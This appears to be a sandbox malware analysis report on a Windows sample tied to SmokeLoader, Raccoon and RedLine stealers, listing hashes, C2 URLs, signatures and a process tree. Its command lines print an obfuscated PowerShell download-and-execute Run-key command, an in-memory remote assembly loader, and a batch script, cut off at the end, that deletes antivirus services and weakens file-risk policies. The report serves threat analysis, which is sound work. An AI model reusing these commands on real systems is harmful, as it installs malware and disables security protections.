Analysis
-
max time kernel
151s -
max time network
144s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
13-08-2021 06:43
Static task
static1
Behavioral task
behavioral1
Sample
762a6aad9e19cfdc94653d3cdf7ad24c.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
762a6aad9e19cfdc94653d3cdf7ad24c.exe
Resource
win10v20210410
General
-
Target
762a6aad9e19cfdc94653d3cdf7ad24c.exe
-
Size
310KB
-
MD5
762a6aad9e19cfdc94653d3cdf7ad24c
-
SHA1
a7c10d06cad6498c5a525ee6ec4565439a55ca34
-
SHA256
c8dc6ed0d081d67f6b686a19ca7f5e211eb502dec5b287cd85b6a37035f20bd7
-
SHA512
11b05afe0aa9c9b4383458f29b39a178a25320991fd5ba7df1dccec205fe1ca7c228ca5faa688abc65c5e1c3e4aed15147aa01108e6b7cb154f1f0ab5bc8613f
Malware Config
Extracted
http://193.56.146.55/Api/GetFile2
Extracted
smokeloader
2020
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Raccoon Stealer Payload 5 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3908-188-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
behavioral2/memory/3908-191-0x000000000044003F-mapping.dmp | family_raccoon
behavioral2/memory/3908-202-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
behavioral2/memory/496-231-0x00000000048A0000-0x0000000004931000-memory.dmp | family_raccoon
behavioral2/memory/496-243-0x0000000000400000-0x0000000002CA9000-memory.dmp | family_raccoon
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 2080 created 496 | 2080 | WerFault.exe | 2F42.exe
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
201 | 3996 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
pid | process
3252 | CFC9.exe
3412 | D1FC.exe
3732 | D420.exe
1192 | D951.exe
784 | Runtimebroker.exe
3908 | D420.exe
496 | 2F42.exe
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | D951.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | D951.exe
-
Deletes itself 1 IoCs
Processes:
pid | process
2832 | (no process name recorded)
-
Drops startup file 3 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk | Runtimebroker.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid | process
3908 | D420.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\D951.exe | themida
C:\Users\Admin\AppData\Local\Temp\D951.exe | themida
behavioral2/memory/1192-139-0x0000000000BB0000-0x0000000000BB1000-memory.dmp | themida
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" | powershell.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | D951.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid | process
1192 | D951.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
description | pid | process | target process
PID 3988 set thread context of 2440 | 3988 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3732 set thread context of 3908 | 3732 | D420.exe | D420.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
Processes:
pid | pid_target | process | target process
2100 | 3252 | WerFault.exe | CFC9.exe
2080 | 3252 | WerFault.exe | CFC9.exe
2756 | 3252 | WerFault.exe | CFC9.exe
2484 | 3252 | WerFault.exe | CFC9.exe
2040 | 3252 | WerFault.exe | CFC9.exe
1944 | 3252 | WerFault.exe | CFC9.exe
1144 | 784 | WerFault.exe | Runtimebroker.exe
192 | 784 | WerFault.exe | Runtimebroker.exe
496 | 784 | WerFault.exe | Runtimebroker.exe
3788 | 784 | WerFault.exe | Runtimebroker.exe
1584 | 784 | WerFault.exe | Runtimebroker.exe
3448 | 784 | WerFault.exe | Runtimebroker.exe
2176 | 3908 | WerFault.exe | D420.exe
2500 | 496 | WerFault.exe | 2F42.exe
4064 | 496 | WerFault.exe | 2F42.exe
4060 | 496 | WerFault.exe | 2F42.exe
2492 | 496 | WerFault.exe | 2F42.exe
2080 | 496 | WerFault.exe | 2F42.exe
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
2440 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
2440 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
2832 | (no process name recorded; this row is repeated 62 times in the report)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
2832 | (no process name recorded)
-
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
pid | process
2440 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
2832 | (no process name recorded; this row is repeated 18 times in the report)
-
Suspicious use of AdjustPrivilegeToken 56 IoCs
Processes:
description | pid | process
Token: SeRestorePrivilege | 2100 | WerFault.exe
Token: SeBackupPrivilege | 2100 | WerFault.exe
Token: SeDebugPrivilege | 2100 | WerFault.exe
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeDebugPrivilege | 2080 | WerFault.exe
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeDebugPrivilege | 2756 | WerFault.exe
Token: SeDebugPrivilege | 2484 | WerFault.exe
Token: SeDebugPrivilege | 2040 | WerFault.exe
Token: SeDebugPrivilege | 1192 | D951.exe
Token: SeDebugPrivilege | 1944 | WerFault.exe
Token: SeDebugPrivilege | 1144 | WerFault.exe
Token: SeDebugPrivilege | 192 | WerFault.exe
Token: SeDebugPrivilege | 496 | WerFault.exe
Token: SeDebugPrivilege | 3788 | WerFault.exe
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeDebugPrivilege | 1584 | WerFault.exe
Token: SeDebugPrivilege | 1340 | powershell.exe
Token: SeDebugPrivilege | 3732 | D420.exe
Token: SeDebugPrivilege | 3996 | powershell.exe
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeDebugPrivilege | 2176 | WerFault.exe
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeDebugPrivilege | 4020 | powershell.exe
Token: SeDebugPrivilege | 2500 | WerFault.exe
Token: SeDebugPrivilege | 4064 | WerFault.exe
Token: SeDebugPrivilege | 4060 | cmd.exe
Token: SeDebugPrivilege | 2492 | WerFault.exe
Token: SeDebugPrivilege | 2080 | WerFault.exe
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
Token: SeShutdownPrivilege | 2832 |
Token: SeCreatePagefilePrivilege | 2832 |
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | process
2832 | (no process name recorded)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 3988 wrote to memory of 2440 | 3988 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440 | 3988 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440 | 3988 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440 | 3988 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440 | 3988 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440 | 3988 | 762a6aad9e19cfdc94653d3cdf7ad24c.exe | 762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 2832 wrote to memory of 3252 | 2832 | | CFC9.exe
PID 2832 wrote to memory of 3252 | 2832 | | CFC9.exe
PID 2832 wrote to memory of 3252 | 2832 | | CFC9.exe
PID 2832 wrote to memory of 3412 | 2832 | | D1FC.exe
PID 2832 wrote to memory of 3412 | 2832 | | D1FC.exe
PID 2832 wrote to memory of 3412 | 2832 | | D1FC.exe
PID 2832 wrote to memory of 3732 | 2832 | | D420.exe
PID 2832 wrote to memory of 3732 | 2832 | | D420.exe
PID 2832 wrote to memory of 3732 | 2832 | | D420.exe
PID 2832 wrote to memory of 1192 | 2832 | | D951.exe
PID 2832 wrote to memory of 1192 | 2832 | | D951.exe
PID 2832 wrote to memory of 1192 | 2832 | | D951.exe
PID 3252 wrote to memory of 784 | 3252 | CFC9.exe | Runtimebroker.exe
PID 3252 wrote to memory of 784 | 3252 | CFC9.exe | Runtimebroker.exe
PID 3252 wrote to memory of 784 | 3252 | CFC9.exe | Runtimebroker.exe
PID 3412 wrote to memory of 3132 | 3412 | D1FC.exe | cmd.exe
PID 3412 wrote to memory of 3132 | 3412 | D1FC.exe | cmd.exe
PID 3412 wrote to memory of 3132 | 3412 | D1FC.exe | cmd.exe
PID 784 wrote to memory of 1340 | 784 | Runtimebroker.exe | powershell.exe
PID 784 wrote to memory of 1340 | 784 | Runtimebroker.exe | powershell.exe
PID 784 wrote to memory of 1340 | 784 | Runtimebroker.exe | powershell.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 3732 wrote to memory of 3908 | 3732 | D420.exe | D420.exe
PID 784 wrote to memory of 3996 | 784 | Runtimebroker.exe | powershell.exe
PID 784 wrote to memory of 3996 | 784 | Runtimebroker.exe | powershell.exe
PID 784 wrote to memory of 3996 | 784 | Runtimebroker.exe | powershell.exe
PID 2832 wrote to memory of 496 | 2832 | | 2F42.exe
PID 2832 wrote to memory of 496 | 2832 | | 2F42.exe
PID 2832 wrote to memory of 496 | 2832 | | 2F42.exe
PID 2832 wrote to memory of 3540 | 2832 | | explorer.exe
PID 2832 wrote to memory of 3540 | 2832 | | explorer.exe
PID 2832 wrote to memory of 3540 | 2832 | | explorer.exe
PID 2832 wrote to memory of 3540 | 2832 | | explorer.exe
PID 3996 wrote to memory of 4020 | 3996 | powershell.exe | powershell.exe
PID 3996 wrote to memory of 4020 | 3996 | powershell.exe | powershell.exe
PID 3996 wrote to memory of 4020 | 3996 | powershell.exe | powershell.exe
PID 2832 wrote to memory of 2040 | 2832 | | explorer.exe
PID 2832 wrote to memory of 2040 | 2832 | | explorer.exe
PID 2832 wrote to memory of 2040 | 2832 | | explorer.exe
PID 2832 wrote to memory of 420 | 2832 | | explorer.exe
PID 2832 wrote to memory of 420 | 2832 | | explorer.exe
PID 2832 wrote to memory of 420 | 2832 | | explorer.exe
PID 2832 wrote to memory of 420 | 2832 | | explorer.exe
PID 2832 wrote to memory of 3936 | 2832 | | explorer.exe
PID 2832 wrote to memory of 3936 | 2832 | | explorer.exe
PID 2832 wrote to memory of 3936 | 2832 | | explorer.exe
PID 2832 wrote to memory of 2428 | 2832 | | explorer.exe
PID 2832 wrote to memory of 2428 | 2832 | | explorer.exe
PID 2832 wrote to memory of 2428 | 2832 | | explorer.exe
PID 2832 wrote to memory of 2428 | 2832 | | explorer.exe
PID 2832 wrote to memory of 1624 | 2832 | | explorer.exe
Processes
-
Level 1: C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe"
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
Level 2: C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
Level 1: C:\Users\Admin\AppData\Local\Temp\CFC9.exe
Command line: C:\Users\Admin\AppData\Local\Temp\CFC9.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
Level 2: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 868
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 880
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 920
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 888
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 956
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 880
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\ProgramData\Runtimebroker.exe
Command line: "C:\ProgramData\Runtimebroker.exe"
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 732
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 784
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 760
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 796
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 976
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 1040
- Program crash
-
Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" Get-MpPreference -verbose
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\SysWOW64\cmd.exe
Command line (the batch commands recorded after the executable are shown one per line):
"C:\Windows\System32\cmd.exe"
@echo off
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
) else (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
